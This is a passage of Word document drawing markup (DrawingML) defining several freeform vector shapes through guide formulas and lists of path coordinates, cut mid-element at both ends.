                              <a:gd name="T51" fmla="*/ 720 h 1168"/>
                              <a:gd name="T52" fmla="*/ 57 w 535"/>
                              <a:gd name="T53" fmla="*/ 487 h 1168"/>
                              <a:gd name="T54" fmla="*/ 123 w 535"/>
                              <a:gd name="T55" fmla="*/ 292 h 1168"/>
                              <a:gd name="T56" fmla="*/ 189 w 535"/>
                              <a:gd name="T57" fmla="*/ 176 h 1168"/>
                              <a:gd name="T58" fmla="*/ 238 w 535"/>
                              <a:gd name="T59" fmla="*/ 78 h 1168"/>
                              <a:gd name="T60" fmla="*/ 296 w 535"/>
                              <a:gd name="T61" fmla="*/ 20 h 1168"/>
                              <a:gd name="T62" fmla="*/ 337 w 535"/>
                              <a:gd name="T63" fmla="*/ 0 h 1168"/>
                              <a:gd name="T64" fmla="*/ 387 w 535"/>
                              <a:gd name="T65" fmla="*/ 0 h 1168"/>
                              <a:gd name="T66" fmla="*/ 428 w 535"/>
                              <a:gd name="T67" fmla="*/ 20 h 1168"/>
                              <a:gd name="T68" fmla="*/ 493 w 535"/>
                              <a:gd name="T69" fmla="*/ 137 h 1168"/>
                              <a:gd name="T70" fmla="*/ 518 w 535"/>
                              <a:gd name="T71" fmla="*/ 234 h 1168"/>
                              <a:gd name="T72" fmla="*/ 535 w 535"/>
                              <a:gd name="T73" fmla="*/ 331 h 1168"/>
                              <a:gd name="T74" fmla="*/ 535 w 535"/>
                              <a:gd name="T75" fmla="*/ 468 h 1168"/>
                              <a:gd name="T76" fmla="*/ 518 w 535"/>
                              <a:gd name="T77" fmla="*/ 584 h 1168"/>
                              <a:gd name="T78" fmla="*/ 502 w 535"/>
                              <a:gd name="T79" fmla="*/ 682 h 1168"/>
                              <a:gd name="T80" fmla="*/ 469 w 535"/>
                              <a:gd name="T81" fmla="*/ 779 h 1168"/>
                              <a:gd name="T82" fmla="*/ 436 w 535"/>
                              <a:gd name="T83" fmla="*/ 837 h 1168"/>
                              <a:gd name="T84" fmla="*/ 395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395" y="857"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="378" y="837"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395" y="798"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="403" y="740"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="411" y="643"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="403" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362" y="390"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="304" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="273"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="370"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="584"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="720"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="779"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90" y="818"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="99" y="876"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="935"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="1012"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="1090"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="1149"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="1168"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="1149"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="1051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="837"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="720"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="487"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="176"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="296" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="337" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="387" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="428" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="493" y="137"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="518" y="234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="535" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="535" y="468"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="518" y="584"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="502" y="682"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="469" y="779"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="436" y="837"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395"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445624275" name="Freeform 15"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6929" y="6105"/>
                            <a:ext cx="82" cy="212"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 123 w 493"/>
                              <a:gd name="T1" fmla="*/ 311 h 1265"/>
                              <a:gd name="T2" fmla="*/ 131 w 493"/>
                              <a:gd name="T3" fmla="*/ 350 h 1265"/>
                              <a:gd name="T4" fmla="*/ 156 w 493"/>
                              <a:gd name="T5" fmla="*/ 331 h 1265"/>
                              <a:gd name="T6" fmla="*/ 181 w 493"/>
                              <a:gd name="T7" fmla="*/ 292 h 1265"/>
                              <a:gd name="T8" fmla="*/ 222 w 493"/>
                              <a:gd name="T9" fmla="*/ 273 h 1265"/>
                              <a:gd name="T10" fmla="*/ 271 w 493"/>
                              <a:gd name="T11" fmla="*/ 311 h 1265"/>
                              <a:gd name="T12" fmla="*/ 329 w 493"/>
                              <a:gd name="T13" fmla="*/ 389 h 1265"/>
                              <a:gd name="T14" fmla="*/ 362 w 493"/>
                              <a:gd name="T15" fmla="*/ 526 h 1265"/>
                              <a:gd name="T16" fmla="*/ 370 w 493"/>
                              <a:gd name="T17" fmla="*/ 662 h 1265"/>
                              <a:gd name="T18" fmla="*/ 362 w 493"/>
                              <a:gd name="T19" fmla="*/ 778 h 1265"/>
                              <a:gd name="T20" fmla="*/ 329 w 493"/>
                              <a:gd name="T21" fmla="*/ 876 h 1265"/>
                              <a:gd name="T22" fmla="*/ 238 w 493"/>
                              <a:gd name="T23" fmla="*/ 1051 h 1265"/>
                              <a:gd name="T24" fmla="*/ 189 w 493"/>
                              <a:gd name="T25" fmla="*/ 1090 h 1265"/>
                              <a:gd name="T26" fmla="*/ 164 w 493"/>
                              <a:gd name="T27" fmla="*/ 1070 h 1265"/>
                              <a:gd name="T28" fmla="*/ 140 w 493"/>
                              <a:gd name="T29" fmla="*/ 1051 h 1265"/>
                              <a:gd name="T30" fmla="*/ 115 w 493"/>
                              <a:gd name="T31" fmla="*/ 1031 h 1265"/>
                              <a:gd name="T32" fmla="*/ 98 w 493"/>
                              <a:gd name="T33" fmla="*/ 1051 h 1265"/>
                              <a:gd name="T34" fmla="*/ 66 w 493"/>
                              <a:gd name="T35" fmla="*/ 1090 h 1265"/>
                              <a:gd name="T36" fmla="*/ 24 w 493"/>
                              <a:gd name="T37" fmla="*/ 1129 h 1265"/>
                              <a:gd name="T38" fmla="*/ 8 w 493"/>
                              <a:gd name="T39" fmla="*/ 1148 h 1265"/>
                              <a:gd name="T40" fmla="*/ 0 w 493"/>
                              <a:gd name="T41" fmla="*/ 1148 h 1265"/>
                              <a:gd name="T42" fmla="*/ 8 w 493"/>
                              <a:gd name="T43" fmla="*/ 1187 h 1265"/>
                              <a:gd name="T44" fmla="*/ 49 w 493"/>
                              <a:gd name="T45" fmla="*/ 1246 h 1265"/>
                              <a:gd name="T46" fmla="*/ 90 w 493"/>
                              <a:gd name="T47" fmla="*/ 1265 h 1265"/>
                              <a:gd name="T48" fmla="*/ 140 w 493"/>
                              <a:gd name="T49" fmla="*/ 1265 h 1265"/>
                              <a:gd name="T50" fmla="*/ 189 w 493"/>
                              <a:gd name="T51" fmla="*/ 1226 h 1265"/>
                              <a:gd name="T52" fmla="*/ 280 w 493"/>
                              <a:gd name="T53" fmla="*/ 1109 h 1265"/>
                              <a:gd name="T54" fmla="*/ 362 w 493"/>
                              <a:gd name="T55" fmla="*/ 954 h 1265"/>
                              <a:gd name="T56" fmla="*/ 419 w 493"/>
                              <a:gd name="T57" fmla="*/ 817 h 1265"/>
                              <a:gd name="T58" fmla="*/ 452 w 493"/>
                              <a:gd name="T59" fmla="*/ 681 h 1265"/>
                              <a:gd name="T60" fmla="*/ 477 w 493"/>
                              <a:gd name="T61" fmla="*/ 564 h 1265"/>
                              <a:gd name="T62" fmla="*/ 493 w 493"/>
                              <a:gd name="T63" fmla="*/ 448 h 1265"/>
                              <a:gd name="T64" fmla="*/ 493 w 493"/>
                              <a:gd name="T65" fmla="*/ 350 h 1265"/>
                              <a:gd name="T66" fmla="*/ 477 w 493"/>
                              <a:gd name="T67" fmla="*/ 253 h 1265"/>
                              <a:gd name="T68" fmla="*/ 436 w 493"/>
                              <a:gd name="T69" fmla="*/ 97 h 1265"/>
                              <a:gd name="T70" fmla="*/ 395 w 493"/>
                              <a:gd name="T71" fmla="*/ 20 h 1265"/>
                              <a:gd name="T72" fmla="*/ 345 w 493"/>
                              <a:gd name="T73" fmla="*/ 0 h 1265"/>
                              <a:gd name="T74" fmla="*/ 296 w 493"/>
                              <a:gd name="T75" fmla="*/ 0 h 1265"/>
                              <a:gd name="T76" fmla="*/ 247 w 493"/>
                              <a:gd name="T77" fmla="*/ 20 h 1265"/>
                              <a:gd name="T78" fmla="*/ 197 w 493"/>
                              <a:gd name="T79" fmla="*/ 78 h 1265"/>
                              <a:gd name="T80" fmla="*/ 164 w 493"/>
                              <a:gd name="T81" fmla="*/ 136 h 1265"/>
                              <a:gd name="T82" fmla="*/ 140 w 493"/>
                              <a:gd name="T83" fmla="*/ 214 h 1265"/>
                              <a:gd name="T84" fmla="*/ 123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311"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="131" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222" y="273"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362" y="526"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370" y="662"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362" y="778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329" y="876"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="1051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="1090"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164" y="1070"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="1051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="1031"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="98" y="1051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="1090"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="24" y="1129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="1148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="1187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="1246"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90" y="1265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="1265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="1226"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="1109"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362" y="954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="419" y="817"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="452" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="477" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="493" y="448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="493" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="477" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="436" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="345" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="296" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123"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727684229" name="Freeform 16"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6876" y="6115"/>
                            <a:ext cx="128" cy="302"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8 w 765"/>
                              <a:gd name="T1" fmla="*/ 1790 h 1809"/>
                              <a:gd name="T2" fmla="*/ 0 w 765"/>
                              <a:gd name="T3" fmla="*/ 1692 h 1809"/>
                              <a:gd name="T4" fmla="*/ 16 w 765"/>
                              <a:gd name="T5" fmla="*/ 1556 h 1809"/>
                              <a:gd name="T6" fmla="*/ 25 w 765"/>
                              <a:gd name="T7" fmla="*/ 1439 h 1809"/>
                              <a:gd name="T8" fmla="*/ 8 w 765"/>
                              <a:gd name="T9" fmla="*/ 1342 h 1809"/>
                              <a:gd name="T10" fmla="*/ 8 w 765"/>
                              <a:gd name="T11" fmla="*/ 1303 h 1809"/>
                              <a:gd name="T12" fmla="*/ 25 w 765"/>
                              <a:gd name="T13" fmla="*/ 1303 h 1809"/>
                              <a:gd name="T14" fmla="*/ 41 w 765"/>
                              <a:gd name="T15" fmla="*/ 1303 h 1809"/>
                              <a:gd name="T16" fmla="*/ 66 w 765"/>
                              <a:gd name="T17" fmla="*/ 1303 h 1809"/>
                              <a:gd name="T18" fmla="*/ 156 w 765"/>
                              <a:gd name="T19" fmla="*/ 1225 h 1809"/>
                              <a:gd name="T20" fmla="*/ 255 w 765"/>
                              <a:gd name="T21" fmla="*/ 1089 h 1809"/>
                              <a:gd name="T22" fmla="*/ 346 w 765"/>
                              <a:gd name="T23" fmla="*/ 934 h 1809"/>
                              <a:gd name="T24" fmla="*/ 403 w 765"/>
                              <a:gd name="T25" fmla="*/ 778 h 1809"/>
                              <a:gd name="T26" fmla="*/ 452 w 765"/>
                              <a:gd name="T27" fmla="*/ 583 h 1809"/>
                              <a:gd name="T28" fmla="*/ 485 w 765"/>
                              <a:gd name="T29" fmla="*/ 369 h 1809"/>
                              <a:gd name="T30" fmla="*/ 485 w 765"/>
                              <a:gd name="T31" fmla="*/ 272 h 1809"/>
                              <a:gd name="T32" fmla="*/ 477 w 765"/>
                              <a:gd name="T33" fmla="*/ 155 h 1809"/>
                              <a:gd name="T34" fmla="*/ 469 w 765"/>
                              <a:gd name="T35" fmla="*/ 116 h 1809"/>
                              <a:gd name="T36" fmla="*/ 469 w 765"/>
                              <a:gd name="T37" fmla="*/ 77 h 1809"/>
                              <a:gd name="T38" fmla="*/ 510 w 765"/>
                              <a:gd name="T39" fmla="*/ 58 h 1809"/>
                              <a:gd name="T40" fmla="*/ 568 w 765"/>
                              <a:gd name="T41" fmla="*/ 97 h 1809"/>
                              <a:gd name="T42" fmla="*/ 592 w 765"/>
                              <a:gd name="T43" fmla="*/ 97 h 1809"/>
                              <a:gd name="T44" fmla="*/ 650 w 765"/>
                              <a:gd name="T45" fmla="*/ 58 h 1809"/>
                              <a:gd name="T46" fmla="*/ 732 w 765"/>
                              <a:gd name="T47" fmla="*/ 0 h 1809"/>
                              <a:gd name="T48" fmla="*/ 757 w 765"/>
                              <a:gd name="T49" fmla="*/ 0 h 1809"/>
                              <a:gd name="T50" fmla="*/ 765 w 765"/>
                              <a:gd name="T51" fmla="*/ 0 h 1809"/>
                              <a:gd name="T52" fmla="*/ 765 w 765"/>
                              <a:gd name="T53" fmla="*/ 19 h 1809"/>
                              <a:gd name="T54" fmla="*/ 757 w 765"/>
                              <a:gd name="T55" fmla="*/ 58 h 1809"/>
                              <a:gd name="T56" fmla="*/ 740 w 765"/>
                              <a:gd name="T57" fmla="*/ 252 h 1809"/>
                              <a:gd name="T58" fmla="*/ 724 w 765"/>
                              <a:gd name="T59" fmla="*/ 408 h 1809"/>
                              <a:gd name="T60" fmla="*/ 724 w 765"/>
                              <a:gd name="T61" fmla="*/ 467 h 1809"/>
                              <a:gd name="T62" fmla="*/ 732 w 765"/>
                              <a:gd name="T63" fmla="*/ 603 h 1809"/>
                              <a:gd name="T64" fmla="*/ 732 w 765"/>
                              <a:gd name="T65" fmla="*/ 642 h 1809"/>
                              <a:gd name="T66" fmla="*/ 724 w 765"/>
                              <a:gd name="T67" fmla="*/ 681 h 1809"/>
                              <a:gd name="T68" fmla="*/ 716 w 765"/>
                              <a:gd name="T69" fmla="*/ 681 h 1809"/>
                              <a:gd name="T70" fmla="*/ 691 w 765"/>
                              <a:gd name="T71" fmla="*/ 661 h 1809"/>
                              <a:gd name="T72" fmla="*/ 642 w 765"/>
                              <a:gd name="T73" fmla="*/ 642 h 1809"/>
                              <a:gd name="T74" fmla="*/ 601 w 765"/>
                              <a:gd name="T75" fmla="*/ 661 h 1809"/>
                              <a:gd name="T76" fmla="*/ 510 w 765"/>
                              <a:gd name="T77" fmla="*/ 719 h 1809"/>
                              <a:gd name="T78" fmla="*/ 428 w 765"/>
                              <a:gd name="T79" fmla="*/ 856 h 1809"/>
                              <a:gd name="T80" fmla="*/ 370 w 765"/>
                              <a:gd name="T81" fmla="*/ 972 h 1809"/>
                              <a:gd name="T82" fmla="*/ 296 w 765"/>
                              <a:gd name="T83" fmla="*/ 1187 h 1809"/>
                              <a:gd name="T84" fmla="*/ 247 w 765"/>
                              <a:gd name="T85" fmla="*/ 1439 h 1809"/>
                              <a:gd name="T86" fmla="*/ 214 w 765"/>
                              <a:gd name="T87" fmla="*/ 1634 h 1809"/>
                              <a:gd name="T88" fmla="*/ 206 w 765"/>
                              <a:gd name="T89" fmla="*/ 1712 h 1809"/>
                              <a:gd name="T90" fmla="*/ 214 w 765"/>
                              <a:gd name="T91" fmla="*/ 1751 h 1809"/>
                              <a:gd name="T92" fmla="*/ 206 w 765"/>
                              <a:gd name="T93" fmla="*/ 1770 h 1809"/>
                              <a:gd name="T94" fmla="*/ 197 w 765"/>
                              <a:gd name="T95" fmla="*/ 1790 h 1809"/>
                              <a:gd name="T96" fmla="*/ 156 w 765"/>
                              <a:gd name="T97" fmla="*/ 1751 h 1809"/>
                              <a:gd name="T98" fmla="*/ 107 w 765"/>
                              <a:gd name="T99" fmla="*/ 1770 h 1809"/>
                              <a:gd name="T100" fmla="*/ 41 w 765"/>
                              <a:gd name="T101" fmla="*/ 1809 h 1809"/>
                              <a:gd name="T102" fmla="*/ 8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8" y="1790"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1692"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="1556"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="1439"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="1342"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="1303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="1303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="1303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="1303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="1225"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="1089"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="346" y="934"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="403" y="778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="452" y="583"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="485" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="485" y="272"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="477" y="155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="469" y="116"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="469" y="77"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="510" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="568" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="592" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="650" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="732" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="757" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="765" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="765" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="757" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="740" y="252"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="724" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="724" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="732" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="732" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="724" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="716" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="691" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="642" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="601" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="510" y="719"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="428" y="856"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370" y="972"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="296" y="1187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="1439"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="1634"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="206" y="1712"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="1751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="206" y="1770"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="1790"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="1751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="1770"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="1809"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8"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185567603" name="Freeform 17"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5631" y="4251"/>
                            <a:ext cx="47" cy="113"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 165 w 280"/>
                              <a:gd name="T1" fmla="*/ 603 h 681"/>
                              <a:gd name="T2" fmla="*/ 197 w 280"/>
                              <a:gd name="T3" fmla="*/ 642 h 681"/>
                              <a:gd name="T4" fmla="*/ 230 w 280"/>
                              <a:gd name="T5" fmla="*/ 642 h 681"/>
                              <a:gd name="T6" fmla="*/ 230 w 280"/>
                              <a:gd name="T7" fmla="*/ 564 h 681"/>
                              <a:gd name="T8" fmla="*/ 222 w 280"/>
                              <a:gd name="T9" fmla="*/ 448 h 681"/>
                              <a:gd name="T10" fmla="*/ 230 w 280"/>
                              <a:gd name="T11" fmla="*/ 272 h 681"/>
                              <a:gd name="T12" fmla="*/ 247 w 280"/>
                              <a:gd name="T13" fmla="*/ 175 h 681"/>
                              <a:gd name="T14" fmla="*/ 272 w 280"/>
                              <a:gd name="T15" fmla="*/ 39 h 681"/>
                              <a:gd name="T16" fmla="*/ 280 w 280"/>
                              <a:gd name="T17" fmla="*/ 20 h 681"/>
                              <a:gd name="T18" fmla="*/ 272 w 280"/>
                              <a:gd name="T19" fmla="*/ 0 h 681"/>
                              <a:gd name="T20" fmla="*/ 255 w 280"/>
                              <a:gd name="T21" fmla="*/ 39 h 681"/>
                              <a:gd name="T22" fmla="*/ 222 w 280"/>
                              <a:gd name="T23" fmla="*/ 117 h 681"/>
                              <a:gd name="T24" fmla="*/ 140 w 280"/>
                              <a:gd name="T25" fmla="*/ 331 h 681"/>
                              <a:gd name="T26" fmla="*/ 49 w 280"/>
                              <a:gd name="T27" fmla="*/ 545 h 681"/>
                              <a:gd name="T28" fmla="*/ 16 w 280"/>
                              <a:gd name="T29" fmla="*/ 603 h 681"/>
                              <a:gd name="T30" fmla="*/ 8 w 280"/>
                              <a:gd name="T31" fmla="*/ 642 h 681"/>
                              <a:gd name="T32" fmla="*/ 0 w 280"/>
                              <a:gd name="T33" fmla="*/ 681 h 681"/>
                              <a:gd name="T34" fmla="*/ 16 w 280"/>
                              <a:gd name="T35" fmla="*/ 681 h 681"/>
                              <a:gd name="T36" fmla="*/ 58 w 280"/>
                              <a:gd name="T37" fmla="*/ 662 h 681"/>
                              <a:gd name="T38" fmla="*/ 99 w 280"/>
                              <a:gd name="T39" fmla="*/ 642 h 681"/>
                              <a:gd name="T40" fmla="*/ 132 w 280"/>
                              <a:gd name="T41" fmla="*/ 603 h 681"/>
                              <a:gd name="T42" fmla="*/ 148 w 280"/>
                              <a:gd name="T43" fmla="*/ 603 h 681"/>
                              <a:gd name="T44" fmla="*/ 165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65" y="603"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="197" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222" y="448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="272"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="58" y="662"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="99" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="165"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113362886" name="Freeform 18"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5609" y="4238"/>
